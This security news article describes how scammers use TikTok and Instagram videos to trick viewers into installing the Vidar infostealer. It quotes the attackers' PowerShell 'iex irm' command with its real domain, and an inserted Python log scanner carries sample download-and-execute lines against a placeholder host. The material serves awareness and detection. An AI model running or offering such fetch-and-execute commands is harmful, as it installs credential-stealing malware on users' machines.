Beware of Scammers Using TikTok & Instagram for Vidar Infostealer Malware Spreads


Cybercriminals are leveraging TikTok and Instagram Reels to deploy Vidar infostealer malware, according to findings from threat intelligence firm ReversingLabs.

Attack Method and Social Media Tactics

The campaigns utilize social media engagement metrics to amplify malicious content, targeting users through deceptive video tutorials that promise access to premium software. The attack method involves creating accounts with branding resembling official entities, such as Windows, to build credibility.

Deceptive Video Tutorials

Videos feature polished visuals and automated voiceovers, guiding users to execute commands in PowerShell. One technique involves instructing viewers to input the command “iex irm” followed by a domain like msget.run/spotify. This action triggers the download of a file named build.exe, which contains the Vidar infostealer.
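As an added example (constructed here, not code from the article or from ReversingLabs), the following Python scans PowerShell script-block log entries for the download-and-execute pattern described above: `iex` (an alias of `Invoke-Expression`) fed by `irm` (`Invoke-RestMethod`) or a similar fetch. The sample log lines and the `placeholder.invalid` domain are constructed; only the alias names are real PowerShell.

```python
import re

# Constructed sample script-block log entries (in the style of PowerShell
# Event ID 4104 ScriptBlockText). The domain is a placeholder, not the real one.
SAMPLE_SCRIPT_BLOCKS = [
    "Get-ChildItem C:\\Users | Sort-Object Length",
    "iex (irm https://placeholder.invalid/spotify)",
    "iex (irm placeholder.invalid/spotify)",  # scheme omitted, as in the videos
    "Invoke-Expression (Invoke-RestMethod -Uri 'http://placeholder.invalid/x')",
    "IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/a.ps1')",
    "iwr https://placeholder.invalid/build.exe -OutFile build.exe",
    "Write-Host 'irm is shorthand for Invoke-RestMethod'",  # benign mention
]

# Execution primitives and remote-fetch primitives, matched case-insensitively
# because PowerShell cmdlet and alias names are not case-sensitive.
EXEC_PATTERN = re.compile(r"\b(iex|invoke-expression)\b", re.IGNORECASE)
FETCH_PATTERN = re.compile(
    r"\b(irm|invoke-restmethod|iwr|invoke-webrequest|downloadstring)\b", re.IGNORECASE
)
URL_PATTERN = re.compile(r"""https?://[^\s'")]+""", re.IGNORECASE)


def classify(script_block):
    """Return (severity, urls) for one script block.

    high   : remote content is fetched and executed in memory (iex + irm etc.)
    medium : a download to disk with a visible URL; the dropped file needs review
    none   : nothing fetched and executed (a bare mention of 'irm' is not enough)
    """
    has_exec = EXEC_PATTERN.search(script_block) is not None
    has_fetch = FETCH_PATTERN.search(script_block) is not None
    urls = URL_PATTERN.findall(script_block)
    if has_exec and has_fetch:
        return "high", urls
    if has_fetch and urls:
        return "medium", urls
    return "none", urls


def scan(script_blocks):
    """Return every flagged block as (severity, urls, block), skipping 'none'."""
    hits = []
    for block in script_blocks:
        severity, urls = classify(block)
        if severity != "none":
            hits.append((severity, urls, block))
    return hits


if __name__ == "__main__":
    for severity, urls, block in scan(SAMPLE_SCRIPT_BLOCKS):
        print(f"[{severity}] {block}  urls={urls}")
```

The rule deliberately requires both a fetch and an execute primitive for a high-severity hit, so a comment or help text that merely mentions `irm` is not flagged.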

Exploiting User Curiosity

A secondary approach exploits user curiosity by posting videos showcasing premium app features set to trending music. Viewers are prompted to comment with specific keywords, after which attackers send direct messages containing malicious links.

Distribution via Social Media Algorithms

The videos gain traction through platform algorithms that prioritize content with high save and share rates, enabling widespread distribution. One analyzed clip amassed 109,000 views, 1,699 saves, and 974 shares.

Vidar Infostealer Overview

Vidar infostealer is available as a malware-as-a-service (MaaS) on underground markets, with a lifetime license priced at $300. It extracts sensitive data, including login credentials, banking information, and browser cookies. Recent updates have enhanced its stability and ability to bypass security measures. Attackers also remove warnings left by victims, complicating detection efforts.

Platform Response and Recommendations

ReversingLabs reported the malicious accounts to Instagram, but the platform declined to take action. Researchers emphasize that users should avoid executing unverified commands in terminal utilities. Organizations are advised to educate employees about risks hidden within consumer social media content.

Evolving Threat Landscape

The study highlights the evolving tactics of threat actors, who shift focus from traditional phishing methods to social media-based deception. Experts warn that these campaigns may proliferate further, as users are less likely to scrutinize content labeled as helpful rather than overtly suspicious. Proactive awareness and technical safeguards remain critical defenses against such threats.
